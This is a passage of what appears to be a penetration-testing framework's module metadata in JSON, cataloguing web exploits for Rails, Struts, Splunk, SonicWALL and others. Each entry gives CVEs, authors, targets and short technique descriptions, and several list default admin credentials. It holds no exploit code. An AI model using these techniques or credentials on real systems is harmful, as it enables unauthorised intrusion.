"description": "This module exploits a remote code execution vulnerability in the explicit render\n method when leveraging user parameters.\n This module has been tested across multiple versions of Ruby on Rails.\n The technique used by this module requires the specified\n endpoint to be using dynamic render paths, such as the following example:\n\n def show\n render params[:id]\n end\n\n Also, the vulnerable target will need a POST endpoint for the TempFile upload; this\n can literally be any endpoint. This module doesn't use the log inclusion method of\n exploitation because it is not universal enough. Instead, a new code injection\n technique was found and used whereby an attacker can upload temporary image files\n against any POST endpoint and use them for the inclusion attack. Finally, you only\n get one shot at this if you are testing with the built-in Rails server, so use caution.",
"references": [
"CVE-2016-0752",
"URL-https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00",
"URL-https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/",
"URL-https://gist.github.com/forced-request/5158759a6418e6376afb"
],
"platform": "BSD,Linux",
"arch": "x86",
"rport": 3000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Ruby on Rails 4.0.8 July 2, 2014"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/rails_dynamic_render_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/rails_dynamic_render_code_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/rails_json_yaml_code_exec": {
"name": "Ruby on Rails JSON Processor YAML Deserialization Code Execution",
"full_name": "exploit/multi/http/rails_json_yaml_code_exec",
"rank": 600,
"disclosure_date": "2013-01-28",
"type": "exploit",
"author": [
"jjarmoc",
"egypt <egypt@metasploit.com>",
"lian"
],
"description": "This module exploits a remote code execution vulnerability in the\n JSON request processor of the Ruby on Rails application framework.\n This vulnerability allows an attacker to instantiate a remote object,\n which in turn can be used to execute any ruby code remotely in the\n context of the application. This vulnerability is very similar to\n CVE-2013-0156.\n\n This module has been tested successfully on RoR 3.0.9, 3.0.19, and\n 2.3.15.\n\n The technique used by this module requires the target to be running a\n fairly recent version of Ruby 1.9 (since 2011 or so). Applications\n using Ruby 1.8 may still be exploitable using the init_with() method,\n but this has not been demonstrated.",
"references": [
"CVE-2013-0333",
"OSVDB-89594"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/rails_json_yaml_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/rails_json_yaml_code_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/rails_secret_deserialization": {
"name": "Ruby on Rails Known Secret Session Cookie Remote Code Execution",
"full_name": "exploit/multi/http/rails_secret_deserialization",
"rank": 600,
"disclosure_date": "2013-04-11",
"type": "exploit",
"author": [
"joernchen of Phenoelit <joernchen@phenoelit.de>"
],
"description": "This module implements Remote Command Execution on Ruby on Rails applications.\n The prerequisite is knowledge of the \"secret_token\" (Rails 2/3) or \"secret_key_base\"\n (Rails 4). The values for those can usually be found in the file\n \"RAILS_ROOT/config/initializers/secret_token.rb\". The module achieves RCE by\n deserialization of a crafted Ruby Object.",
"references": [
"CVE-2013-0156",
"URL-http://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-07-09 13:22:08 +0000",
"path": "/modules/exploits/multi/http/rails_secret_deserialization.rb",
"is_install_path": true,
"ref_name": "multi/http/rails_secret_deserialization",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/rails_web_console_v2_code_exec": {
"name": "Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution",
"full_name": "exploit/multi/http/rails_web_console_v2_code_exec",
"rank": 600,
"disclosure_date": "2015-06-16",
"type": "exploit",
"author": [
"joernchen <joernchen@phenoelit.de>",
"Ben Murphy <benmmurphy@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an IP whitelist bypass vulnerability in the developer\n web console included with Ruby on Rails 4.0.x and 4.1.x. This module will also\n achieve code execution on Rails 4.2.x if the attack is launched from a\n whitelisted IP range.",
"references": [
"CVE-2015-3224",
"URL-http://openwall.com/lists/oss-security/2015/06/16/18",
"URL-https://groups.google.com/forum/message/raw?msg=rubyonrails-security/lzmz9_ijUFw/HBMPi4zp5NAJ",
"URL-https://hackerone.com/reports/44513"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 3000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/rails_web_console_v2_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/rails_web_console_v2_code_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/rails_xml_yaml_code_exec": {
"name": "Ruby on Rails XML Processor YAML Deserialization Code Execution",
"full_name": "exploit/multi/http/rails_xml_yaml_code_exec",
"rank": 600,
"disclosure_date": "2013-01-07",
"type": "exploit",
"author": [
"charliesome",
"espes",
"lian",
"hdm <x@hdm.io>"
],
"description": "This module exploits a remote code execution vulnerability in the XML request\n processor of the Ruby on Rails application framework. This vulnerability allows\n an attacker to instantiate a remote object, which in turn can be used to execute\n any ruby code remotely in the context of the application.\n\n This module has been tested across multiple versions of RoR 3.x and RoR 2.x\n\n The technique used by this module requires the target to be running a fairly recent\n version of Ruby 1.9 (since 2011 or so). Applications using Ruby 1.8 may still be\n exploitable using the init_with() method, but this has not been demonstrated.",
"references": [
"CVE-2013-0156",
"OSVDB-89026",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156"
],
"platform": "Ruby",
"arch": "ruby",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/rails_xml_yaml_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/rails_xml_yaml_code_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/rocket_servergraph_file_requestor_rce": {
"name": "Rocket Servergraph Admin Center fileRequestor Remote Code Execution",
"full_name": "exploit/multi/http/rocket_servergraph_file_requestor_rce",
"rank": 500,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses several directory traversal flaws in Rocket Servergraph Admin\n Center for Tivoli Storage Manager. The issues exist in the fileRequestor servlet,\n allowing a remote attacker to write arbitrary files and execute commands with\n administrative privileges. This module has been tested successfully on Rocket\n ServerGraph 1.2 on Windows 2008 R2 64-bit, Windows 7 SP1 32-bit and Ubuntu\n 12.04 64-bit.",
"references": [
"CVE-2014-3914",
"ZDI-14-161",
"ZDI-14-162",
"BID-67779"
],
"platform": "Linux,Unix,Windows",
"arch": "x86, x64, cmd",
"rport": 8888,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux (Native Payload)",
"Linux (CMD Payload)",
"Windows / VB Script",
"Windows CMD"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/rocket_servergraph_file_requestor_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/rocket_servergraph_file_requestor_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/sflog_upload_exec": {
"name": "Sflog! CMS 1.0 Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/sflog_upload_exec",
"rank": 600,
"disclosure_date": "2012-07-06",
"type": "exploit",
"author": [
"dun",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits multiple design flaws in Sflog 1.0. By default, the CMS has\n a default admin credential of \"admin:secret\", which can be abused to access\n administrative features such as blogs management. Through the management\n interface, we can upload a backdoor that's accessible by any remote user, and then\n gain arbitrary code execution.",
"references": [
"OSVDB-83767",
"EDB-19626"
],
"platform": "Linux,PHP",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/sflog_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/sflog_upload_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/simple_backdoors_exec": {
"name": "Simple Backdoor Shell Remote Code Execution",
"full_name": "exploit/multi/http/simple_backdoors_exec",
"rank": 600,
"disclosure_date": "2015-09-08",
"type": "exploit",
"author": [
"Jay Turla <@shipcod3>"
],
"description": "This module exploits unauthenticated simple web backdoor shells by leveraging the\n common backdoor shell's vulnerable parameter to execute commands. The SecLists project of\n Daniel Miessler and Jason Haddix has a lot of samples for these kinds of backdoor shells,\n which are categorized under Payloads.",
"references": [
"URL-http://resources.infosecinstitute.com/checking-out-backdoor-shells/",
"URL-https://github.com/danielmiessler/SecLists/tree/master/Payloads"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"backdoor / Unix",
"backdoor / Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/simple_backdoors_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/simple_backdoors_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/sit_file_upload": {
"name": "Support Incident Tracker Remote Command Execution",
"full_name": "exploit/multi/http/sit_file_upload",
"rank": 600,
"disclosure_date": "2011-11-10",
"type": "exploit",
"author": [
"Secunia Research",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module combines two separate issues within the Support Incident Tracker (<= 3.65)\n application to upload arbitrary data and thus execute a shell. The two issues exist\n in ftp_upload_file.php.\n The first vulnerability exposes the upload dir used to store attachments.\n The second vulnerability allows arbitrary file upload since there is no\n validation function to prevent uploading arbitrary file types.\n Authentication is required to exploit both vulnerabilities.",
"references": [
"CVE-2011-3829",
"CVE-2011-3833",
"OSVDB-76999",
"OSVDB-77003",
"URL-http://secunia.com/secunia_research/2011-75/",
"URL-http://secunia.com/secunia_research/2011-79/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/sit_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/sit_file_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/snortreport_exec": {
"name": "Snortreport nmap.php/nbtscan.php Remote Command Execution",
"full_name": "exploit/multi/http/snortreport_exec",
"rank": 600,
"disclosure_date": "2011-09-19",
"type": "exploit",
"author": [
"Paul Rascagneres"
],
"description": "This module exploits an arbitrary command execution vulnerability in\n nmap.php and nbtscan.php scripts.",
"references": [
"OSVDB-67739",
"URL-http://www.symmetrixtech.com/articles/news-016.html"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/snortreport_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/snortreport_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/solarwinds_store_manager_auth_filter": {
"name": "SolarWinds Storage Manager Authentication Bypass",
"full_name": "exploit/multi/http/solarwinds_store_manager_auth_filter",
"rank": 600,
"disclosure_date": "2014-08-19",
"type": "exploit",
"author": [
"rgod <rgod@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability in Solarwinds Storage Manager.\n The vulnerability exists in the AuthenticationFilter, which allows authentication to be bypassed\n with specially crafted URLs. After bypassing authentication, it is possible to use a file\n upload function to achieve remote code execution. This module has been tested successfully\n on Solarwinds Store Manager Server 5.1.0 and 5.7.1 on 32-bit Windows, 64-bit Windows and\n 64-bit Linux operating systems.",
"references": [
"CVE-2015-5371",
"ZDI-14-299"
],
"platform": "Linux,Windows",
"arch": "java",
"rport": 9000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Solarwinds Store Manager <= 5.7.1"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/solarwinds_store_manager_auth_filter.rb",
"is_install_path": true,
"ref_name": "multi/http/solarwinds_store_manager_auth_filter",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/sonicwall_gms_upload": {
"name": "SonicWALL GMS 6 Arbitrary File Upload",
"full_name": "exploit/multi/http/sonicwall_gms_upload",
"rank": 600,
"disclosure_date": "2012-01-17",
"type": "exploit",
"author": [
"Nikolas Sotiriu",
"Redsadic <julian.vilas@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in SonicWALL GMS. It exploits two\n vulnerabilities in order to achieve its objective. An authentication bypass in the\n Web Administration interface allows abuse of the \"appliance\" application to upload\n an arbitrary payload embedded in a JSP. The module has been tested successfully on\n SonicWALL GMS 6.0.6017 on Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual\n Appliance (Linux). On the Virtual Appliance the Linux Meterpreter did not run\n successfully while testing, so a shell payload has been used.",
"references": [
"CVE-2013-1359",
"OSVDB-89347",
"BID-57445",
"EDB-24204"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"SonicWALL GMS 6.0 Viewpoint / Java Universal",
"SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2",
"SonicWALL GMS 6.0 Viewpoint Virtual Appliance (Linux)"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/sonicwall_gms_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/sonicwall_gms_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/sonicwall_scrutinizer_methoddetail_sqli": {
"name": "Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection",
"full_name": "exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli",
"rank": 600,
"disclosure_date": "2014-07-24",
"type": "exploit",
"author": [
"bperry",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Dell SonicWALL Scrutinizer. The methodDetail\n parameter in exporters.php allows an attacker to write arbitrary files to the file system\n with an SQL Injection attack, and gain remote code execution under the context of SYSTEM\n for Windows, or as Apache for Linux.\n\n Authentication is required to exploit this vulnerability, but this module uses\n the default admin:admin credential.",
"references": [
"CVE-2014-4977",
"BID-68495",
"URL-https://seclists.org/fulldisclosure/2014/Jul/44",
"URL-https://gist.github.com/brandonprry/76741d9a0d4f518fe297"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Dell SonicWALL Scrutinizer 11.01 on Windows",
"Dell SonicWALL Scrutinizer 11.01 Linux Appliance"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/sonicwall_scrutinizer_methoddetail_sqli.rb",
"is_install_path": true,
"ref_name": "multi/http/sonicwall_scrutinizer_methoddetail_sqli",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/splunk_mappy_exec": {
"name": "Splunk Search Remote Code Execution",
"full_name": "exploit/multi/http/splunk_mappy_exec",
"rank": 600,
"disclosure_date": "2011-12-12",
"type": "exploit",
"author": [
"Gary O'Leary-Steele",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a command execution vulnerability in the\n web based interface of Splunk 4.2 to 4.2.4. The vulnerability exists\n in the 'mappy' search command which allows attackers to run Python code.\n To exploit this vulnerability, a valid Splunk user with the admin\n role is required. By default, this module uses the credential of \"admin:changeme\",\n the default Administrator credential for Splunk. Note that the Splunk web interface\n runs as SYSTEM on Windows and as root on Linux by default.",
"references": [
"OSVDB-77695",
"BID-51061",
"CVE-2011-4642",
"URL-http://www.splunk.com/view/SP-CAAAGMM",
"URL-http://www.sec-1.com/blog/?p=233"
],
"platform": "Linux,Unix,Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal CMD"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/splunk_mappy_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/splunk_mappy_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/splunk_upload_app_exec": {
"name": "Splunk Custom App Remote Code Execution",
"full_name": "exploit/multi/http/splunk_upload_app_exec",
"rank": 400,
"disclosure_date": "2012-09-27",
"type": "exploit",
"author": [
"marcwickenden",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>",
"Gary Blosser",
"Matteo Malvica"
],
"description": "This module exploits a feature of Splunk whereby a custom application can be\n uploaded through the web based interface. Through the 'script' search command a\n user can call commands defined in their custom application, which includes arbitrary\n Perl or Python code. To abuse this behavior, a valid Splunk user with the admin\n role is required. By default, this module uses the credential of \"admin:changeme\",\n the default Administrator credential for Splunk. Note that the Splunk web interface\n runs as SYSTEM on Windows, or as root on Linux by default. This module has been\n tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4.\n Version 7.2.4 has been tested successfully against OSX as well.",
"references": [
"URL-http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html",
"URL-http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html",
"URL-http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script"
],
"platform": "Linux,OSX,Unix,Windows",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Splunk >= 7.2.4 / Linux",
"Splunk >= 7.2.4 / Windows",
"Splunk >= 7.2.4 / OSX",
"Splunk >= 5.0.1 / Linux",
"Splunk >= 5.0.1 / Windows"
],
"mod_time": "2019-03-19 15:28:24 +0000",
"path": "/modules/exploits/multi/http/splunk_upload_app_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/splunk_upload_app_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/spree_search_exec": {
"name": "Spreecommerce 0.60.1 Arbitrary Command Execution",
"full_name": "exploit/multi/http/spree_search_exec",
"rank": 600,
"disclosure_date": "2011-10-05",
"type": "exploit",
"author": [
"joernchen <joernchen@phenoelit.de>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n Spreecommerce search. Unvalidated input is called via the\n Ruby send method allowing command execution.",
"references": [
"OSVDB-76011",
"URL-http://spreecommerce.com/blog/2011/10/05/remote-command-product-group/"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/spree_search_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/spree_search_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/spree_searchlogic_exec": {
"name": "Spreecommerce Arbitrary Command Execution",
"full_name": "exploit/multi/http/spree_searchlogic_exec",
"rank": 600,
"disclosure_date": "2011-04-19",
"type": "exploit",
"author": [
"joernchen <joernchen@phenoelit.de>"
],
"description": "This module exploits an arbitrary command execution vulnerability in\n the Spreecommerce API searchlogic for versions 0.50.0 and earlier.\n Unvalidated input is called via the Ruby send method allowing command\n execution.",
"references": [
"OSVDB-71900",
"URL-http://www.spreecommerce.com/blog/2011/04/19/security-fixes/"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/spree_searchlogic_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/spree_searchlogic_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts2_code_exec_showcase": {
"name": "Apache Struts 2 Struts 1 Plugin Showcase OGNL Code Execution",
"full_name": "exploit/multi/http/struts2_code_exec_showcase",
"rank": 600,
"disclosure_date": "2017-07-07",
"type": "exploit",
"author": [
"icez <ic3z at qq dot com>",
"Nixawk",
"xfer0"
],
"description": "This module exploits a remote code execution vulnerability in the Struts Showcase app in the Struts 1 plugin example in Struts 2.3.x series. Remote Code Execution can be performed via a malicious field value.",
"references": [
"CVE-2017-9791",
"BID-99484",
"EDB-42324",
"URL-https://cwiki.apache.org/confluence/display/WW/S2-048"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal"
],
"mod_time": "2018-05-16 05:39:17 +0000",
"path": "/modules/exploits/multi/http/struts2_code_exec_showcase.rb",
"is_install_path": true,
"ref_name": "multi/http/struts2_code_exec_showcase",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts2_content_type_ognl": {
"name": "Apache Struts Jakarta Multipart Parser OGNL Injection",
"full_name": "exploit/multi/http/struts2_content_type_ognl",
"rank": 600,
"disclosure_date": "2017-03-07",
"type": "exploit",
"author": [
"Nike.Zheng",
"Nixawk",
"Chorder",
"egypt <egypt@metasploit.com>",
"Jeffrey Martin"
],
"description": "This module exploits a remote code execution vulnerability in Apache Struts\n version 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed\n via the HTTP Content-Type header.\n\n Native payloads will be converted to executables and dropped in the\n server's temp dir. If this fails, try a cmd/* payload, which won't\n have to write to the disk.",
"references": [
"CVE-2017-5638",
"URL-https://cwiki.apache.org/confluence/display/WW/S2-045"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Universal"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/struts2_content_type_ognl.rb",
"is_install_path": true,
"ref_name": "multi/http/struts2_content_type_ognl",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts2_namespace_ognl": {
"name": "Apache Struts 2 Namespace Redirect OGNL Injection",
"full_name": "exploit/multi/http/struts2_namespace_ognl",
"rank": 600,
"disclosure_date": "2018-08-22",
"type": "exploit",
"author": [
"Man Yue Mo",
"hook-s3c",
"asoto-r7",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a remote code execution vulnerability in Apache Struts\n version 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed\n via an endpoint that makes use of a redirect action.\n\n Note that this exploit is dependent on the version of Tomcat running on\n the target. Versions of Tomcat starting with 7.0.88 currently don't\n support payloads larger than ~7.5 KB. Windows Meterpreter sessions on\n Tomcat >=7.0.88 are currently not supported.\n\n Native payloads will be converted to executables and dropped in the\n server's temp dir. If this fails, try a cmd/* payload, which won't\n have to write to the disk.",
"references": [
"CVE-2018-11776",
"URL-https://lgtm.com/blog/apache_struts_CVE-2018-11776",
"URL-https://cwiki.apache.org/confluence/display/WW/S2-057",
"URL-https://github.com/hook-s3c/CVE-2018-11776-Python-PoC"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic detection",
"Windows",
"Linux"
],
"mod_time": "2018-12-14 13:08:50 +0000",
"path": "/modules/exploits/multi/http/struts2_namespace_ognl.rb",
"is_install_path": true,
"ref_name": "multi/http/struts2_namespace_ognl",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts2_rest_xstream": {
"name": "Apache Struts 2 REST Plugin XStream RCE",
"full_name": "exploit/multi/http/struts2_rest_xstream",
"rank": 600,
"disclosure_date": "2017-09-05",
"type": "exploit",
"author": [
"Man Yue Mo",
"wvu <wvu@metasploit.com>"
],
"description": "Apache Struts versions 2.1.2 - 2.3.33 and Struts 2.5 - Struts 2.5.12,\n using the REST plugin, are vulnerable to a Java deserialization attack\n in the XStream library.",
"references": [
"CVE-2017-9805",
"URL-https://struts.apache.org/docs/s2-052.html",
"URL-https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement",
"URL-https://github.com/mbechler/marshalsec"
],
"platform": "Linux,Python,Unix,Windows",
"arch": "cmd, python, x86, x64",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix (In-Memory)",
"Windows (In-Memory)",
"Python (In-Memory)",
"PowerShell (In-Memory)",
"Linux (Dropper)",
"Windows (Dropper)"
],
"mod_time": "2019-02-25 11:13:41 +0000",
"path": "/modules/exploits/multi/http/struts2_rest_xstream.rb",
"is_install_path": true,
"ref_name": "multi/http/struts2_rest_xstream",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_code_exec": {
"name": "Apache Struts Remote Command Execution",
"full_name": "exploit/multi/http/struts_code_exec",
"rank": 400,
"disclosure_date": "2010-07-13",
"type": "exploit",
"author": [
"bannedit <bannedit@metasploit.com>",
"Meder Kydyraliev"
],
"description": "This module exploits a remote command execution vulnerability in\n Apache Struts versions < 2.2.0. This issue is caused by a failure to properly\n handle unicode characters in OGNL extensive expressions passed to the web server.\n\n By sending a specially crafted request to the Struts application it is possible to\n bypass the \"#\" restriction on ParameterInterceptors by using OGNL context variables.\n Bypassing this restriction allows for the execution of arbitrary Java code.",
"references": [
"CVE-2010-1870",
"OSVDB-66280",
"EDB-14360"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Universal",
"Linux Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/struts_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/struts_code_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/struts_code_exec_classloader": {
"name": "Apache Struts ClassLoader Manipulation Remote Code Execution",
"full_name": "exploit/multi/http/struts_code_exec_classloader",
"rank": 0,
"disclosure_date": "2014-03-06",
"type": "exploit",
"author": [
"Mark Thomas",
"Przemyslaw Celej",
"Redsadic <julian.vilas@gmail.com>",
"Matthew Hall <hallm@sec-1.com>"
],
"description": "This module exploits a remote command execution vulnerability in Apache Struts versions\n 1.x (<= 1.3.10) and 2.x (< 2.3.16.2). In Struts 1.x the problem is related to\n the ActionForm bean population mechanism, while in the case of Struts 2.x the vulnerability is due\n to the ParametersInterceptor. Both allow access to the 'class' parameter, which is directly\n mapped to the getClass() method and allows ClassLoader manipulation. As a result, this can\n allow remote attackers to execute arbitrary Java code via crafted parameters.",
"references": [
"CVE-2014-0094",
"CVE-2014-0112",
"CVE-2014-0114",
"URL-http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/",
"URL-http://struts.apache.org/release/2.3.x/docs/s2-020.html",
"URL-http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204",
"URL-https://github.com/rgielen/struts1filter/tree/develop"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java",
"Linux",
"Windows",
"Windows / Tomcat 6 & 7 and GlassFish 4 (Remote SMB Resource)"
],
